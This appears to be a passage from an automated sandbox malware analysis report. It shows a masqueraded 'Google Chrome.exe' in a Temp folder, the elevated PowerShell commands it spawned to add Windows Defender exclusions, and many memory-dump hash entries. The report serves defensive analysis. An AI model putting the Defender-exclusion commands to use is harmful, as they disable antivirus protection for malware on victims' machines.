                                                  Path:C:\Users\user\AppData\Local\Temp\Google Chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Google Chrome.exe"
                                                  Imagebase:0x940000
                                                  File size:178'176 bytes
                                                  MD5 hash:D30B86E01EF85AA5FCF4292CB295F00F
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:26
                                                  Start time:08:03:50
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:27
                                                  Start time:08:03:50
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:28
                                                  Start time:08:04:03
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:29
                                                  Start time:08:04:03
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (Qh$(Qh
                                                    • API String ID: 0-834373534
                                                    • Opcode ID: 581afc6350bd8db72c27c9c611f5c6ccc085569d9233209ae76a3c426a6a3267
                                                    • Instruction ID: dde150de97d8604fddfc134488b83de17590b86370936f7e7565dff1a2d515b5
                                                    • Opcode Fuzzy Hash: 581afc6350bd8db72c27c9c611f5c6ccc085569d9233209ae76a3c426a6a3267
                                                    • Instruction Fuzzy Hash: C5F1A130A1A91A8FDB98EB68C464A7977F2FF55311B108239E45ED32F2CE74AC45C780
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6g$6g$"rg$"rg$r6g$r6g$r6g$r6g$r6g
                                                    • API String ID: 0-171950219
                                                    • Opcode ID: 26ea0f78072d23b2e5ef95dae49114e5ae11b5ddd63e55d17310b0ac3165d923
                                                    • Instruction ID: 089023477c7a5d730e6f243d28f1948a876ca955f196047ea4fe7ae041687015
                                                    • Opcode Fuzzy Hash: 26ea0f78072d23b2e5ef95dae49114e5ae11b5ddd63e55d17310b0ac3165d923
                                                    • Instruction Fuzzy Hash: 97A13961B19A458FE798EF7C88597B8B7E2FF9D350F048179D04DC36A2CE68984583C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6g$"rg$r6g$r6g$r6g
                                                    • API String ID: 0-571899652
                                                    • Opcode ID: 6c2758d7a372874010b094b88c20b0fb3e1a327ecb4b68e5bc5bec9fa60c2da9
                                                    • Instruction ID: d9049d5b9e45a5302eda2545fd82fd27e99b56755134b3738b198c797b115bd1
                                                    • Opcode Fuzzy Hash: 6c2758d7a372874010b094b88c20b0fb3e1a327ecb4b68e5bc5bec9fa60c2da9
                                                    • Instruction Fuzzy Hash: F5613961A0E7818FE3599BB84859679BFE1FF6A250F0881BED08CC36F3DD64584993C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8[q$r6g
                                                    • API String ID: 0-2420977302
                                                    • Opcode ID: 49527299e78eb10e935e68ab6395e1208f963501b3de89b92c4e14af1d368939
                                                    • Instruction ID: a8fb98a5f8e5c94436b296d90806b1c12fd74868f7ce02513a401118282ed714
                                                    • Opcode Fuzzy Hash: 49527299e78eb10e935e68ab6395e1208f963501b3de89b92c4e14af1d368939
                                                    • Instruction Fuzzy Hash: B0114C62F4E8491FF364A7BC68565F577E5CB9A260B054176E04CC3AE3DC1C588783D0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8[q$r6g
                                                    • API String ID: 0-2420977302
                                                    • Opcode ID: e00ef33eee8d2972d5a0295a506651c667e5dc8627bbcdad8ea0e6125e8c57cf
                                                    • Instruction ID: 0b0c069e7aa88e07eda0cc5465464f280af0e19482db1b7c2a51d675844c566e
                                                    • Opcode Fuzzy Hash: e00ef33eee8d2972d5a0295a506651c667e5dc8627bbcdad8ea0e6125e8c57cf
                                                    • Instruction Fuzzy Hash: 06F02852F1AC0A0BF3B8BABD649A7F567D6DBDD260F004079E04DC27A6DC589C8283C0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^
                                                    • API String ID: 0-897003143
                                                    • Opcode ID: 935ea0628342b4cb9b24911ab31be5a05e76b07585dca768b581fd28291b7f8b
                                                    • Instruction ID: 5bc0e0ceaebf33660f7d5b67a94564fccf89db76fd6f8c6e828c70f522e09942
                                                    • Opcode Fuzzy Hash: 935ea0628342b4cb9b24911ab31be5a05e76b07585dca768b581fd28291b7f8b
                                                    • Instruction Fuzzy Hash: 6F21E362E0F3819FE3166778D4691F83B70DF83264F0984B7C18D8A4B3DD1D248A8392
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8eq
                                                    • API String ID: 0-356513418
                                                    • Opcode ID: 7d752cdc0c4eaeeaa01e6c6d2bd80f9154afeeaf78d4c3f7de29cc883e0a8975
                                                    • Instruction ID: ee07e514863f299e1858266a3e24b781c1724326cd4ba4a12a51ef0279966a5b
                                                    • Opcode Fuzzy Hash: 7d752cdc0c4eaeeaa01e6c6d2bd80f9154afeeaf78d4c3f7de29cc883e0a8975
                                                    • Instruction Fuzzy Hash: 80F0BB21919B514FD794AB2C88954797BE0DF95250B05457AE848C62A2D92CD58583C1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aee0eb8644101eaa4f0b6d4a2054f59f1878a2cc174f41cbeb16853103f740b8
                                                    • Instruction ID: 2f984549b36615e996a317f548dfa0c106a9c8cc83fb47dbc6497e0ed630779c
                                                    • Opcode Fuzzy Hash: aee0eb8644101eaa4f0b6d4a2054f59f1878a2cc174f41cbeb16853103f740b8
                                                    • Instruction Fuzzy Hash: 9831157190A7CA8FD745D7A8C8651FD7FF1EF86250F4580BAC009E75B3CD58184A8391
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: adf734f7ecf92b451d445873c62dcdcfa98c1261518bc44f70e4ebaa067339e2
                                                    • Instruction ID: 756c7158dfc490d6019888d0e047de6c7df0e697a86cbd8e4aaf6f2a8f173306
                                                    • Opcode Fuzzy Hash: adf734f7ecf92b451d445873c62dcdcfa98c1261518bc44f70e4ebaa067339e2
                                                    • Instruction Fuzzy Hash: B8210831A1895D4FD755EB38C865AB9B3E1FF89340F0480B6D00EC36A2DE38E84587C0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d96e0273c24c98ef84e74003c5d0617b0ab76c762c359018b1aaf0c2a4181b16
                                                    • Instruction ID: 90e62183551a4d3ebf947c2b0ac697914e04583ea0e46a71224c8332177cb9dc
                                                    • Opcode Fuzzy Hash: d96e0273c24c98ef84e74003c5d0617b0ab76c762c359018b1aaf0c2a4181b16
                                                    • Instruction Fuzzy Hash: B021DA31B0A65C8FE765AB7884656B937A1EF4A311F4041BBD40EC72E3CD399C458781
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ceea4336b34e62b2c30103fd7850c8200b071d7c5cd611167c870c10498e0f55
                                                    • Instruction ID: a00b5a81070350f6623894a6a115469052e19bd9c6bf3f358905f1dd1fc209c6
                                                    • Opcode Fuzzy Hash: ceea4336b34e62b2c30103fd7850c8200b071d7c5cd611167c870c10498e0f55
                                                    • Instruction Fuzzy Hash: 2211C875A28C5E4BD7A8FB78C451AB9B3E5FF99340F0084B5D00EC3692DE38A84547C0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8a2ece0c40e4e5f47d539d3e39ff3296921d0722d540a3223ee6f23e77784f76
                                                    • Instruction ID: b090f5c46134f0a3aeecbc0977d43db4247a8f27f999e85788d8704144aef356
                                                    • Opcode Fuzzy Hash: 8a2ece0c40e4e5f47d539d3e39ff3296921d0722d540a3223ee6f23e77784f76
                                                    • Instruction Fuzzy Hash: CA11A730B1591D8FE764BB7984557B933A1EB8D355F10417AE40EC37A2CD39984587C0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1754480620.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaab780000_X.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6g$"rg$r6g$r6g
                                                    • API String ID: 0-3015325437
                                                    • Opcode ID: 1fbe9cdf8907894eff36173c2faac9042ac1bb8119fd9e6435bf153d0d4a4b46
                                                    • Instruction ID: 0d8f8defd71e94e53e703a96e31e397400aea7272c1fd557b0faa317742c6ba9
                                                    • Opcode Fuzzy Hash: 1fbe9cdf8907894eff36173c2faac9042ac1bb8119fd9e6435bf153d0d4a4b46
                                                    • Instruction Fuzzy Hash: E051F661B19A458FE798EF6C88557B8A7E2FF9D350F048179D04DC36A3DE68A88583C0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468313485.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6g
                                                    • API String ID: 0-1031791518
                                                    • Opcode ID: 485c77312a2b52ca7f6a7a63e124213d692950d36d3824e2d6cf652c74514e6b
                                                    • Instruction ID: 8a00bc474c3a5e1a2f81108427cf1a9e7fab56f8826864482ebed1bcae51aca7
                                                    • Opcode Fuzzy Hash: 485c77312a2b52ca7f6a7a63e124213d692950d36d3824e2d6cf652c74514e6b
                                                    • Instruction Fuzzy Hash: 1AD18B30A09A4D8FDB88DF58C454EA97BB1FF69340F14826AD40DD72A6CA75E845CBC1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468931609.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 09b9709c8b2e406ee73bfd73287d34a42b3e4eeed2705aa7dcdd6bac003c98e0
                                                    • Instruction ID: f762dccbef8a1eaa1d75d17b77b74439711ed4a42708bb38de2fe21a15b73daf
                                                    • Opcode Fuzzy Hash: 09b9709c8b2e406ee73bfd73287d34a42b3e4eeed2705aa7dcdd6bac003c98e0
                                                    • Instruction Fuzzy Hash: F6D1366290EBCA9FE765976C98255F9BF91EF1B350F0841FED44DCB0A3D918A80983C1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468313485.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d49846dc2f8dde0c591b2f9210b7cb925fbff4e12f11d7664fc7bcc1df3e413b
                                                    • Instruction ID: 98a2836b27216ef245a51ab221853d48f74f04000516e6fbcfda182cdb82a35d
                                                    • Opcode Fuzzy Hash: d49846dc2f8dde0c591b2f9210b7cb925fbff4e12f11d7664fc7bcc1df3e413b
                                                    • Instruction Fuzzy Hash: C2514B72A0DB889FE7599B1C9C165E97FF0FF56321F04427FD489831A2DE61680687C2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1467693296.00007FFAAB67D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB67D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab67d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 981ba1d4a87a67ef895c287042e141efb54550759d169b289301f5f566b02a15
                                                    • Instruction ID: 72e02ac6a996038f6a5ebdb04e917f8692d6747063dfefcd9ee80b226c0334d0
                                                    • Opcode Fuzzy Hash: 981ba1d4a87a67ef895c287042e141efb54550759d169b289301f5f566b02a15
                                                    • Instruction Fuzzy Hash: 1141257140DBC48FE756CB2898459523FF0EF57360B1505EFE088CB1A3D625A84AC792
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468313485.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3d2f514d7e1d3af8f771920ca88cea4c4d0882b699eed8c724123b3448ff3942
                                                    • Instruction ID: b8ccdfc8647aaae5eb3977507ffbba9958933c369b705fa9f2f98caf560b6b36
                                                    • Opcode Fuzzy Hash: 3d2f514d7e1d3af8f771920ca88cea4c4d0882b699eed8c724123b3448ff3942
                                                    • Instruction Fuzzy Hash: DD31C3B380A6DACFD7569B689C660E47FB0EE6211874843F7D08CCA0A3F91A550987D2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468313485.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 92224a63126f1093c0c1ba9e2ab76bfbecf749df3b71d940f12f97fe4ebc1387
                                                    • Instruction ID: 2ca27009c3accb6132f3265c907fd9c77d50e6b586316a939d465b05911e79e2
                                                    • Opcode Fuzzy Hash: 92224a63126f1093c0c1ba9e2ab76bfbecf749df3b71d940f12f97fe4ebc1387
                                                    • Instruction Fuzzy Hash: 12212B3190DB4C8FDB58DB6C984A7E97FF0EB56331F04416BD049C3162DA74541ACB91
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468313485.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction ID: b1e65471143f2844b230ed71ff2fda1b7ab4172bc61a6a0745b4548f68134739
                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction Fuzzy Hash: FA01677115CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468931609.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a00354c8d85679b5e21c5dd1e7dac28ec7c0de40bab422982d77f63072c2177a
                                                    • Instruction ID: cbd550c6da8c6a45b38cb37aef437fcc03510f9732fa168bd3f246e16ad4f7fa
                                                    • Opcode Fuzzy Hash: a00354c8d85679b5e21c5dd1e7dac28ec7c0de40bab422982d77f63072c2177a
                                                    • Instruction Fuzzy Hash: 0FF0BE32A0D5488FD759EB5CE4428E8B3E0EF5A360B1540FAE05DC71B3DA25EC44C780
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468931609.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e29d118b918ae68ff0e61d61777d74bc26b3c8480348f855631f5cd3f66260fa
                                                    • Instruction ID: c687871b80a238b3d345ecaf8309d65afc6bf49a9161007c39d453b6ba0a215c
                                                    • Opcode Fuzzy Hash: e29d118b918ae68ff0e61d61777d74bc26b3c8480348f855631f5cd3f66260fa
                                                    • Instruction Fuzzy Hash: 3BF0BE32A0E5448FD755EB1CE0528E8B7E0FF0A720B4540F6E04DC7063DA26AC44C780
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468931609.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                    • Instruction ID: 0e292ba13caaa3d36185f6c91dbd74b335d1caea5cceec33205345a09a996438
                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                    • Instruction Fuzzy Hash: 28E0E531B0C808CF9A68DB0CE0519A9B3E1EB99361B1541A6D14EC7561DA22FC558B80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468313485.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M_^$M_^$M_^$M_^
                                                    • API String ID: 0-2235110077
                                                    • Opcode ID: 126a91b963783532aff52bf9f73e1bb7397b26d31c3c714d9af4c4de5c474d0a
                                                    • Instruction ID: 5a56d4acc8fdf067b90a2b307ca87297ece38d3735f89cd0854b772d50838f04
                                                    • Opcode Fuzzy Hash: 126a91b963783532aff52bf9f73e1bb7397b26d31c3c714d9af4c4de5c474d0a
                                                    • Instruction Fuzzy Hash: BB41579290F7C2DFE39A47584C690957FB0EF6369474D43F7C0C98B4F3E95A180A8292
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1468313485.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M_^$M_^$M_^$M_^
                                                    • API String ID: 0-2235110077
                                                    • Opcode ID: dcca1bbf8518ab800c8cdb83c7c2b5d6457c4918aec0375b56c28f514f9c6759
                                                    • Instruction ID: 196be03e2b39f9782f42ea23528302c8715f99f2f80f7a3cf00926d94e1effdc
                                                    • Opcode Fuzzy Hash: dcca1bbf8518ab800c8cdb83c7c2b5d6457c4918aec0375b56c28f514f9c6759
                                                    • Instruction Fuzzy Hash: 7331439290FAC2DFF29A475948650A57FB0EF536A474D43F6C089874F3F99B180A41D2
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1700146156.00007FFAAB840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB840000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffaab840000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c1adc334344d1ec31e5ce09808bb04d37e81571bc4465ddfcb01ee777707e97f
                                                    • Instruction ID: bd5868e75d1d325234eb27fdf6133cb31d14f537dd7eea8287b8a3e250f7497e
                                                    • Opcode Fuzzy Hash: c1adc334344d1ec31e5ce09808bb04d37e81571bc4465ddfcb01ee777707e97f
                                                    • Instruction Fuzzy Hash: 67D1366290EBCA9FE7659B7CC8155F9BF91EF1B250B0841FED44DCB0A3D918A809C391
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1697699943.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffaab770000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 79d85dc631725fd858d4a0bd5653ea0423276013a4d0bb1cb7f9d5d76ef7d282
                                                    • Instruction ID: e22c1b921452ca8992596a697587001281b3a71cc036a9cb54226ba7d3ec14fe
                                                    • Opcode Fuzzy Hash: 79d85dc631725fd858d4a0bd5653ea0423276013a4d0bb1cb7f9d5d76ef7d282
                                                    • Instruction Fuzzy Hash: C051377250EBC59FE70ACB2CC8955607BE0EF5725870841BED48ACB2B3ED15A847C782
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1697699943.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffaab770000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6afb2768207d6187ef28f7f1965dcad4f2570cff681a04bef4623ddd2ccd1c77
                                                    • Instruction ID: 71db6a33cf31485394d08cdebb70a708bd4d6a59a724f73367d47061e2c3725b
                                                    • Opcode Fuzzy Hash: 6afb2768207d6187ef28f7f1965dcad4f2570cff681a04bef4623ddd2ccd1c77
                                                    • Instruction Fuzzy Hash: E541E69380FBC28FF31697A858A91E47FB0EF6319571844F7D5898A1B3E944588EC3D2
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1697699943.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffaab770000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7a32b6793521e8e1a448219db90a979d41d183376224c4306a22604295eb5aaf
                                                    • Instruction ID: bb264fe8cefab40875d5596229929a23cc40c373781945cef7d40a9e9c106f06
                                                    • Opcode Fuzzy Hash: 7a32b6793521e8e1a448219db90a979d41d183376224c4306a22604295eb5aaf
                                                    • Instruction Fuzzy Hash: 6931F97190DB489FEB189F4C98466F97BE0FB99311F00812FE04D93262CA60A8558BC2
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1695615440.00007FFAAB65D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB65D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffaab65d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 424d9f685ebe556778f6e8c6a4e5412e19ad12dc74d2fa4ef605da0235d87c00
                                                    • Instruction ID: 3880b655658f03db6ba28043e3a4623654fa631055e3790133431a3c3847577e
                                                    • Opcode Fuzzy Hash: 424d9f685ebe556778f6e8c6a4e5412e19ad12dc74d2fa4ef605da0235d87c00
                                                    • Instruction Fuzzy Hash: 7741287140EBC48FE756CB2898459623FF0EF57265F1506DFD08DCB1A3D629A80AC792
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1697699943.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffaab770000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 53e41a643d04cc141281828b2cffe5937835dd9bb8bf472f59fe1e502d6e0b52
                                                    • Instruction ID: e26c1d3e0cda73d64811d2b6a64fd492153ac0470ef1a69d66551db1a6074b5a
                                                    • Opcode Fuzzy Hash: 53e41a643d04cc141281828b2cffe5937835dd9bb8bf472f59fe1e502d6e0b52
                                                    • Instruction Fuzzy Hash: AE31467190DBCC8FEB59CBA8984A6E97FF0EB66320F0441AFD048C7163D6645849CB92
                                                    Memory Dump Source
